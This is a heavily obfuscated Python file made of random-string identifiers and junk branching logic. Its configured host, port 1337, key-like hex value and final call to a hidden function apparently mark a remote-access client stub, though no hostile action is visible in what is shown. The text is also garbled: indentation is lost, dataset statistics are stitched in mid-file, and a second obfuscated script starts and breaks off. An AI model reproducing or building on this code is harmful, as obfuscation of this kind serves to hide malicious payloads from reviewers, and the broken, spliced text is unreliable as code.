from core.zMJIDSQBjssyEayGxDrxJGHzInFeSJvxzsGGSMSsCIHSEyiEAwPOFiAvyOoavMB import BwtroWhMwUAJNCIxRHzhDBTSCJpUovQxSozAwFoJQVyMQrvQGDCJOCEBlQCVMfA, GDksjjtSttQJGqJCSHBpJxAJSRDrJIDqHDEJwJyFDxQMvxxSnWJyzVqRauBigxx
try:
luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG = 'uHPeBmEEnIPGEceIAQOsDEFFtznzoDBISIIINyGjISPBLHGGxSHAsDVrByIHxyQ'
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = 'JHnMUIJJzDAoOsXvEokGyCvBEtBIRXrCvBtISdhHHSNmprJrPPtnHxvlITPAjw'
OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX = 'OWgDxmBmrpzGvpHvuASSqtEbGywwmSktXzQGGIxnQQxgOmCmrtxzFDXCApEJLfN'
qESSVPqFIOtBHtxGJssCIKuAzRueqoawFHBzwuAiMvRICEBfQYRxxkGrSjAAsEr = 'RmBujycyGGlrBhsyFzTRmQjGSqENRSpTBsUIJCJvRDZvizFFztAxJRuPjvJoyPx'
vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx = 'QrzFAByGkCFESIqyAPInSSvGGKZvDIVIsHuJeDEIBqkwPBJBtwPGaADxRWCwRJz'
DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr = 'POSmSiAvABGOYUXHQCbIMkYFOEBXIHGyIOPPjJHeHWHUyyuMirDSGUGIBDJDJEA'
GSwRDztzstSzHrHFvMCEBvGGqCNgWwOJkQzSBHIGvxvSGHGBCtEPBhSGumyuCIx = [
'uHPeBmEEnIPGEceIAQOsDEFFtznzoDBISIIINyGjISPBLHGGxSHAsDVrByIHxyQ',
'OWgDxmBmrpzGvpHvuASSqtEbGywwmSktXzQGGIxnQQxgOmCmrtxzFDXCApEJLfN',
'QrzFAByGkCFESIqyAPInSSvGGKZvDIVIsHuJeDEIBqkwPBJBtwPGaADxRWCwRJz',
'uFFuUnxDtFEyzwmPMfXUvDksUDwQyqzwSITHJBRrFQjvvYRupIFEJeAORGnOBDB'
]
for luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG in DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr:
for nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ in OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX:
if qESSVPqFIOtBHtxGJssCIKuAzRueqoawFHBzwuAiMvRICEBfQYRxxkGrSjAAsEr == vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx:
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG
elif vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx == nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ:
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr
else:
vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx = DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr
for nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ in GSwRDztzstSzHrHFvMCEBvGGqCNgWwOJkQzSBHIGvxvSGHGBCtEPBhSGumyuCIx:
OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX = nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ
except Exception:
pass
except ImportError as GRIpvHwJmDsXvKISzSHxOSmrRBkeQuFxFGmJzDJTECGqsYCSyrolqxAeSyHYvuR:
vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG = 'llzLJWoQkGzyxyEMTAiGFBrYPJVeyfSyyFHsxBnoulHsqHuwvwpLwUNGIJHPEtP'
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = 'tGwOEAyvIEJRHGtGfQHRyBSIIwGNezvJFHZOFtuFIswBlzqRvCQrvRSAMpnttEQ'
GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP = 'BSILrwBEqFQkIJQnDAIZXFptJoRqySDEAJIjJxyIvASQcCGvycjCFJwwQuINzJD'
wIFvQYsJFSRvnvAzovVFrSuAeSuJEPRJzHItlxqUHDCgvuyXSxlvyzUPJYIwHLL = 'jHBSHySpBDFYENyuHEAEaSCAfqupwwueyqnrFBDhpJvENIHJFnBAsAHWTvQXhuR'
UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE = 'sEJUWOIjxCAmPgznGsySvJGRMabExBodHSEpYAibNlHGtizyCzEvDySBMynDIPJ'
if vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG in vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT:
vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG = UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE
if vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT in GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP:
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = wIFvQYsJFSRvnvAzovVFrSuAeSuJEPRJzHItlxqUHDCgvuyXSxlvyzUPJYIwHLL
elif vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT in vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG:
GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP = vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT
if GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP in vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT:
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE
print(GRIpvHwJmDsXvKISzSHxOSmrRBkeQuFxFGmJzDJTECGqsYCSyrolqxAeSyHYvuR)
sys.exit(0)
nwsJDSFGtvBSQFxsVSBNEBFkDIeEvfqNEHJStBDIEFuGcCSvRuFGFBOGTCtIxyJ = sys.platform
QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO = 'GSFWuEAGpAwEklfuDJOHKOwEUzwHywxQAwGyjQIvErPvEwHzmzPBIoEywBPxDnD'
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = 'GDhDBJJCweBDssXFLvAuESSEyxRyhkDwpCuXRSWJqnGvMTAYRsTGRhOIEuGxPSu'
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = 'IvyEABRuRwIPLBAqCquBCHnHkkIBdYDmIrCDDTpPFAxAQltxusiTmuQERlPtCEz'
ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC = 'wGyHInFlnxGxXIhGZPEJSyPEJrDoNpVzANsPIyGrvGyHBGNJIAKBDBPZGHrrqHI'
xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB = 'ErBvASsGScEAQreHlMJFQJlDDmqDGsJOrHwsJVQgXSXiQSFGPHTNMGpieymHoCy'
xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW = 'vzNxwardqUroBkGVSRCupivMiFxsBzqSgSRvsrqGyyGDrGASQUGiJHCxClIJQqR'
if QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO != ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC:
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG
for xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW in ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC:
if xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW != CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG:
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD
else:
xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
else:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO = xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB
if CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG == QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO:
for xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW in QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO:
if xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW == CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
else:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB
CIqEQCPyumOPExHuxRHSGBFHzROHQjEPDCrLBtwvGPEFEzpyGLZoeyqvzPRGAHC = 'localhost'
RwTBlAQJirnnuBSxAooWFAEHJqIIPSZPAyBIJrrBQAIrYgbGoBQSgDqRIyyktGG = 'XPnqyABHjboPmIHyJynQFQEExIGMwvRjrBBEtRlHklTFoIAyAPISuzEpJHFBvnZ'
uDYJBloFYIFrEqxyGnBvIxGRBzCxHIzNJZjorRRIyCJErBnJJsDPLFxjvSSJINX = 'hDmyQJfnfPLQsvHYrBwJHnBQKyQwRrQDYJJFEEiBAxrDSDTmBRLwjvDFAzstIzF'
hkRFsqzjsQOuFoqEGACBhIRmNoutXCrtwPwISRFlyHEEPQxCqOfAJHlEoGeFJFE = 'JQtPSGuYgrxqIvOGxCGGcFCrFgFPRpXRzuHowHPHCyzGxBHSIMtwrEDBIDZzBRu'
qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm = 'pFRPrxMyBHwIsyexesMNaHoqyHPWonFpSBIAJGtDjFCFkAHESCHrHGuTiHsGgEB'
ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn = 'hSYYHPnSggRzIREQDQhRFEYQjAJEnIEBFtnJCRNwEJSnJRRvwGkBzXgcADdNkHO'
rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv = 'qCFzkFGQiBAYDJmvrHBCyRlrxlDwexJIPQtxRuIBFRDpIozeQIRDwHpJRxJIHmH'
if hkRFsqzjsQOuFoqEGACBhIRmNoutXCrtwPwISRFlyHEEPQxCqOfAJHlEoGeFJFE == qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm:
for rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv in ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn:
if rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv == qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm:
ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn = RwTBlAQJirnnuBSxAooWFAEHJqIIPSZPAyBIJrrBQAIrYgbGoBQSgDqRIyyktGG
else:
qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm = uDYJBloFYIFrEqxyGnBvIxGRBzCxHIzNJZjorRRIyCJErBnJJsDPLFxjvSSJINX
fnQOIFPteJmyFvhQGBEIESHBAwyZCyBwBCEwIvrwpHikvJwsynfTFDREwwBAEGJ = 1337
CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT = 'EJCytTKGBPTbFAJGLRviQRRRBBJeyJGzSnRRBzDFAYHAwDSEExxGBHXyQEHFyzw'
sHoFJJGxuIROSREMRoGoJWVUlGCJPwVuwGBInyqAsFIwFxzQlNRsFDNDyFSPIt = 'IOBSEEJLxPuJSpINpGHSqFuRGDWFHMbnJXDnGvMYGRymPTAGHHQQGNHsEhGozd'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
if CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT == sHoFJJGxuIROSREMRoGoJWVUlGCJPwVuwGBInyqAsFIwFxzQlNRsFDNDyFSPIt:
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT
else:
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'EJCytTKGBPTbFAJGLRviQRRRBBJeyJGzSnRRBzDFAYHAwDSEExxGBHXyQEHFyzw'
CFRGQCPCzURSYHUgHlEFsBSnFqsWRJFJCLuvAijkNAfyFExtqWWAAuIDRGEQPsj = 'b14ce95fa4c33ac2803782d18341869f'
try:
ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw = 'cOLwQFnGgBRAQmBIPQFyLNqcYIIWTZbfGYvOoPkDBRmORsGSCGwHHELzWETyyxG'
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = 'CElERpyFSPuaRGkrCjStJgQQQtuoPCjCCSMrGmjFQZSGICVpBJVDHCqyOEDCOQE'
QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT = 'GFJYPDSPICOxBUooJuEwvvHokDvDvgRFgsJGJBmyJkPJRFRIGCRgxtGHBhIQzIU'
wwGopDIoJRByVEMiBJHPvnkAHoRFHAZotOCEfxJBInxNRARJCUIXNoHlHrjRtyk = 'JBWBwJzDRqsEHuAqepJGIxDHZsPDPRpXiFHDBnHBsvzJPRHVSJAHEzsqJPQHQBx'
QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr = 'AQFwRCxOQyDzBRPCJwJtquVQkIywjwJpCDugfVQwCSAzwvlDpCtynDBukAIUFyQ'
zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn = 'upyQIBBVSAnJraVqYzWvJGygDAuQkRVOIumwjGBHHmSJjAwHsqvRRICoMoRSzDi'
FXNwZiyJWIesHsmiHJzjGDQwXHvGDEQwQEoRtHPDmsQysXxHGOtOFggNrYVwIus = [
'cOLwQFnGgBRAQmBIPQFyLNqcYIIWTZbfGYvOoPkDBRmORsGSCGwHHELzWETyyxG',
'GFJYPDSPICOxBUooJuEwvvHokDvDvgRFgsJGJBmyJkPJRFRIGCRgxtGHBhIQzIU',
'AQFwRCxOQyDzBRPCJwJtquVQkIywjwJpCDugfVQwCSAzwvlDpCtynDBukAIUFyQ',
'SztutxvJpQPSSAtDNrxDfTwWvHESskJxAhJBIeFJOCODlGoQFxPADJRzUMwmDyr'
]
for ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw in zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn:
for CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG in QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT:
if wwGopDIoJRByVEMiBJHPvnkAHoRFHAZotOCEfxJBInxNRARJCUIXNoHlHrjRtyk == QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr:
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw
elif QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr == CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG:
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn
else:
QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr = zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn
for CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG in FXNwZiyJWIesHsmiHJzjGDQwXHvGDEQwQEoRtHPDmsQysXxHGOtOFggNrYVwIus:
QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT = CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG
except Exception:
pass
if __name__ == '__main__':
QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ = 'BiXAsAGtySJhFpAMxEfvysvhDOHCIyqIGlSAQPJOJoCzzYrZAmxtmwBAHRzzqpE'
vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx = 'oyFlgGRGBBzPuPHhPFACIQmEyDmjiGPXGqvPArPJsOlGQxSeuTvuJCCDmxAgIBu'
jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC = 'tDIjJGFQBIIIIkMGysIIxQJyHiSxgEqqVxJJmAHErtuSQIsyzoHRlAvUzSBJpHp'
tFUPHnwlINDuyCIAzmPCJpAgRrbDCIiBBRIQFPSAFIBWOIQzuUzHSuvvCeGJqRA = 'JHsFpPPFvIwYxPxSJVGAZrpxCFEPZWJudnPFBulvYDDiRHPGquEBPPsEOFQtDOx'
gvEjBJHSxOCFwSJUJGBHfRFmxIPtUzquDkAyxwRRYovHJxtDDJAaqyRFzNODSMS = 'JFAXHSRHPQEuQZHBXAHBXjAxHlzTwJEHEzlExSGfxGSlsdFyFwHYzymSNttHouI'
if QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ in vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx:
QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ = gvEjBJHSxOCFwSJUJGBHfRFmxIPtUzquDkAyxwRRYovHJxtDDJAaqyRFzNODSMS
if vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx in jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC:
vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx = tFUPHnwlINDuyCIAzmPCJpAgRrbDCIiBBRIQFPSAFIBWOIQzuUzHSuvvCeGJqRA
elif vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx in QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ:
jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC = vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx
if jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC in vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx:
vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx = gvEjBJHSxOCFwSJUJGBHfRFmxIPtUzquDkAyxwRRYovHJxtDDJAaqyRFzNODSMS
rAFBSHNfNqQlRskEEOBCJCBrinBnGFJIUAEGRrJSOzbMDFRJPuteotGtOqQIFRF()
| 126.431655 | 278 | 0.865753 | #!/usr/bin/env python
FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF = 'RXLQksAGmIIuwhBJUptxVuytBrDBAdGQAQvkSrGtgiSFnGSZospnORAnCEZHCBz'
zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS = 'RICsbwNkCOqPrHxHGDwjHTJCAhHPGiRZSFzrFITzFLmZFDDAuBRtAxtkQzDUuGg'
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = 'RlQqIOyQNICOIGoFHqDFIoZQFOjWRBBARHSuPBDyRvrvGqgYJtvxYSWSrSGIwqI'
tlsIviJwUFnrJqFHMMxASrlquyGJjQAPvTGFTkYdRunCGzBEAPoRExzFJxRJXJ = 'RqOFwYDPEAExFHFSmzQJjkJwExAoABQCZvXSSrCfLCalJEExvIAOzHERyvxzAVy'
JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH = 'CHImoEVySFSFEvkpOyAmuzBNCzwASPrsQCsCqnzOwSyGyHpRGNGJASuGjFGVQXn'
HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt = 'JGBDRuMQPHYBSFQzFDEGITFTjtPFPFuEXhsHJQGRQwvQPSwxoqXECqQqVPICHwk'
if FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF != tlsIviJwUFnrJqFHMMxASrlquyGJjQAPvTGFTkYdRunCGzBEAPoRExzFJxRJXJ:
zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS = xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg
for HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt in tlsIviJwUFnrJqFHMMxASrlquyGJjQAPvTGFTkYdRunCGzBEAPoRExzFJxRJXJ:
if HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt != xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg:
zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS = zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS
else:
JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH = FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF
else:
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF
FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF = JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH
if xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg == FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF:
for HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt in FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF:
if HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt == xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg:
